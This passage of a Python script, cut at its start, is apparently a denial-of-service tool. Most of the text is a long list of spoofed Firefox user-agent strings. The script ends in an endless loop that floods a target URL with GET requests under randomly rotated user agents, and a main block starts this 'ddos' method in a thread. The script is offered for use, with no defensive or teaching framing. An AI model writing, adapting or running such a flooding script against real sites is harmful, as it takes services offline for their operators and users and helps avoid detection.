'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110208 Firefox/4.2a1pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0',
'Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20120910144328 Firefox/15.0.2',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0',
'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3',
'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6) Gecko/20040206 Firefox/0.8',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 (ax)',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3',
'Mozilla/5.0 (Windows; U; Win98; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3',
'Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1',
'Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2',
'Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3',
'Mozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20040913 Firefox/0.10',
'Mozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20041001 Firefox/0.10.1',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.6) Gecko/20040206 Firefox/0.8',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20040803 Firefox/0.9.3',
'Mozilla/5.0 (Windows; U; Windows NT 4.0; en-US; rv:1.8.0.2) Gecko/20060418 Firefox/1.5.0.2;',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/1.0.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1','Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1','Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2','Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3','Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040626 Firefox/0.9.1','Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3','Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11','Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050321 Firefox/1.0.2','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6) Gecko/20040206 Firefox/0.8','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3','Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',] 

        while True:
            for i in range(1,2):
               user_agent = random.choice(agents)
               headers = {'User-Agent': user_agent}
               print ("[+] Attack in {}".format(self.url))
               try:
                   req = requests.get(self.url,headers=headers)
                   continue
               except requests.exceptions.Timeout:
                   print ("[!] TIME OUT!!!")
                   continue

               except requests.exceptions.RequestException as e:
                   print ("[!] REQUESTS EXCEPT!!!")
                   continue

               except requests.exceptions.HTTPError as err:
                   print ("[!] SITE NOT FOUND!!!")
                   break

               except KeyboardInterrupt:
                   print ("[-] stopping the attack!")
                   exit()
                   

if __name__ == '__main__':
    pwn = HTTP()
    ACCEPT_THREAD = Thread(target=pwn.ddos)
    ACCEPT_THREAD.start()
    ACCEPT_THREAD.join()
